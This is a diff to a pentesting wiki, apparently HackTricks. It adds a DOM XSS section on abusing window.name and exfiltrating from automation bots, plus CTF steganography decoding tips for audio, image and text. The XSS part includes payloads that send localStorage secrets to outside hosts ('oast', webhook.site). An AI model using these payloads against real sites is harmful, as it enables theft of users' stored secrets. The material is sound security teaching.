HackTricks-wiki · carlospolop · Jan 1, 2026
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -326,6 +326,39 @@ RegExp()
 dom-clobbering.md
 {{#endref}}
 
+## Implicit globals & `window.name` abuse
+
+Referencing `name` without a declaration (`var`/`let`/`const`) resolves to `window.name`. Because `window.name` persists across cross-origin navigations, an attacker can pre-seed a browsing context name with HTML/JS and later have victim code render it as trusted data:
+
+- Open/navigate the target in a named context you control:
+
+```html
+<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
+```
+
+- Or reuse `window.open` with a crafted target name:
+
+```javascript
+window.open('https://target/page', "<svg/onload=alert(document.domain)>")
+```
+
+If the application later does `element.innerHTML = name` (or similar sink) without sanitization, the attacker-controlled `window.name` string executes in the target origin, enabling DOM XSS and access to same-origin storage.
+
+## Admin/automation flows: pre-seeded storage & `javascript:` navigation
+
+Automation bots (e.g., Playwright) often visit an internal page first, set secrets in `localStorage`/cookies, then navigate to user-supplied URLs. Any DOM XSS primitive (including `window.name` abuse) in that flow can exfiltrate the seeded secret:
+
+```javascript
+fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))
+```
+
+If the bot does not restrict schemes, supplying a `javascript:` URL (`javascript:fetch(...)`) executes in the current origin without new navigation, directly leaking storage values.
+
+## References
+
+- [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium)
+
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/stego/audio/README.md b/src/stego/audio/README.md
@@ -43,6 +43,23 @@ Primary tool for spectrogram inspection:
 sox input.wav -n spectrogram -o spectrogram.png
 ```
 
+## FSK / modem decoding
+
+Frequency-shift keyed audio often looks like alternating single tones in a spectrogram. Once you have a rough center/shift and baud estimate, brute force with `minimodem`:
+
+```bash
+# Visualize the band to pick baud/frequency
+sox noise.wav -n spectrogram -o spec.png
+
+# Try common bauds until printable text appears
+minimodem -f noise.wav 45
+minimodem -f noise.wav 300
+minimodem -f noise.wav 1200
+minimodem -f noise.wav 2400
+```
+
+`minimodem` autogains and autodetects mark/space tones; adjust `--rx-invert` or `--samplerate` if the output is garbled.
+
 ## WAV LSB
 
 ### Technique
@@ -84,4 +101,9 @@ Online decoders:
 - [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/)
 - [http://dialabc.com/sound/detect/index.html](http://dialabc.com/sound/detect/index.html)
 
+## References
+
+- [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium)
+
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/stego/images/README.md b/src/stego/images/README.md
@@ -190,6 +190,25 @@ Frame differencing is often decisive:
 magick frame_0001.png frame_0002.png -compose difference -composite diff.png
 ```
 
+### APNG pixel-count encoding
+
+- Detect APNG containers: `exiftool -a -G1 file.png | grep -i animation` or `file`.
+- Extract frames without re-timing: `ffmpeg -i file.png -vsync 0 frames/frame_%03d.png`.
+- Recover payloads encoded as per-frame pixel counts:
+
+```python
+from PIL import Image
+import glob
+out = []
+for f in sorted(glob.glob('frames/frame_*.png')):
+    counts = Image.open(f).getcolors()
+    target = dict(counts).get((255, 0, 255, 255))  # adjust the target color
+    out.append(target or 0)
+print(bytes(out).decode('latin1'))
+```
+
+Animated challenges may encode each byte as the count of a specific color in each frame; concatenating the counts reconstructs the message.
+
 ## Password-protected embedding
 
 If you suspect embedding protected by a passphrase rather than pixel-level manipulation, this is usually the fastest path.
@@ -219,4 +238,9 @@ Supports PNG/BMP/GIF/WebP/WAV.
 
 Repo: https://github.com/dhsdshdhk/stegpy
 
+## References
+
+- [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium)
+
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/stego/text/README.md b/src/stego/text/README.md
@@ -41,4 +41,19 @@ for i,ch in enumerate(s):
 PY
 ```
 
+## CSS `unicode-range` channels
+
+`@font-face` rules can encode bytes in `unicode-range: U+..` entries. Extract the codepoints, concatenate the hex, and decode:
+
+```bash
+grep -o "U+[0-9A-Fa-f]\+" styles.css | tr -d 'U+\n' | xxd -r -p
+```
+
+If ranges contain multiple bytes per declaration, split on commas first and normalize (`tr ',+' '\n'`). Python makes it easy to parse and emit bytes if formatting is inconsistent.
+
+## References
+
+- [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium)
+
 {{#include ../../banners/hacktricks-training.md}}
+